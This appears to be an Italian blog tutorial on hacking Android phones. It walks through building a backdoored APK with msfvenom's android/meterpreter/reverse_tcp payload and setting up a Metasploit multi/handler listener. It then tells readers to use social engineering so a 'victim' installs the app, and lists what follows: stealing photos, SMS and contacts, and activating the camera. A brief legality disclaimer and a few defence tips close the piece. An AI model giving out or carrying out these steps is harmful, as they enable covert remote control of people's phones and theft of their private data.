Cari lettori, oggi vi parlerò di una tecnica per hackerare smartphone Android tramite Metasploit.

Tramite questa tecnica potremo creare un apk infetta da inviare alla nostra vittima.

Esistono anche tools che permettono di iniettare un apk infetta all’interno di app reale. Di questa procedura ne parleremo nel prossimo articolo.

Hackerare smartphone Android con Metasploit

Iniziamo il nostro test utilizzando sempre il nostro caro amico Kali Linux.

Apriamo una shell e scriviamo il seguente comando:

Msfconsole

Generiamo l’app per Android, tale app ci servirà per  aprire una backdoor nel telefono di destinazione.

Metasploit ci viene incontro, infatti in uno dei suoi innumerevoli moduli esiste un generatore apposito, per creare l’app.

A questo punto dobbiamo recuperare il nostro indirizzo ip, apriamo una shell e scriviamo il comando:

ifconfig

Copiamo il nostro indirizzo ip.

Come hackerare uno smartphone Android con esempi pratici

In questo test stiamo lavorando nella mia rete locale LAN (la wifi di casa), quindi il telefono che violeremo e il pc sono entrambi nella stessa rete.

Per poter fare il nostro test al di fuori della nostra rete privata,  (in WAN), dovremo utilizzare l’IP esterno del nostro pc (queste info le possiamo otterremo nella pagina del router).

Ora generiamo la nostra apk tramite l’utilizzo di msfvenom, scrivendo il seguente comando:

msfvenom
-p android/meterpreter/reverse_tcp LHOST=(IP macchina kali) LPORT=(port number)
R > backdoored.apk

Inserite l’ip che abbiamo trovato in precedenza e usate un numero di porta maggiore di 1024, nel mio esempio ho utilizzato la porta 4444

Come hackerare uno smartphone Android con esempi pratici

Perfetto, abbiamo ottenuto la nostra apk da inviare al telefono vittima.

Prima di inviare la nostra apk, prepariamo il nostro Kali Linux a ricevere le connessioni dal telefono.

Avviamo Metasploit  e nella shell scriviamo il seguente comando:

use exploit/multi/handler

Confermiamo con l’invio e scriviamo il comando:

set PAYLOAD android/meterpreter/reverse_tcp

Confermiamo con l’invio e scriviamo il comando:

set LHOST 192.168.178.48

192.168.178.48 è il nostro IP che abbiamo recuperato in predenza, confermiamo con l’invio e scriviamo:

set LPORT 4444

4444 è la nostra porta che metteremo in ascolto.

A questo punto scriviamo il comando “run” e attendiamo:

run
Come hackerare uno smartphone Android con esempi pratici

Adesso dobbiamo dare sfogo alle nostre capacità di social engineering, in modo che la vittima installi ed esegua la nostra apk.

Cosa fare quando l’app viene installata

Appena l’app viene installata, la backdoor entra in funzione , et volià, siamo all’interno del telefono.

Come hackerare uno smartphone Android con esempi pratici

Adesso digitiamo il comando “help” per conoscere tutti i comandi che abbiamo a disposizione.

Come hackerare uno smartphone Android con esempi pratici

Abbiamo il telefono sotto controllo, possiamo scaricare immagini, sms, contatti, scattare fotografie, attivare la webcam etc.

Ovviamente nella vita reale per poter installare una apk su un telefono non di nostra proprietà, non è così semplice oltre ad essere ovviamente una pratica illegale, se non abbiamo avuto il consenso da parte del destinatario.

Come proteggersi da attacchi su smartphone Android

Ovviamente seguendo piccoli consigli sarà possibile evitare di cadere in questi attacchi,

  • Non lasciare mai il proprio telefono in mani altrui, (bastano 20” per installare una backdoor);
  • Prima di installare applicazioni ricevute da terze parti, fare sempre un controllo dettagliato;
  • Diffidare sempre se non siete sicuri al 100%;
  • Tenere aggiornato sempre il sistema operativo del proprio device;

Molte tecniche di hack sfruttano proprio delle falle presenti nei sistemi operativi, installando l’app malevola da remoto , senza avere il telefono nelle proprie mani.

N.B.: Non mi assumo nessuna responsabilità dell’uso che farete della guida, in quanto stilata per uso didattico e formativo.

Leggi anche: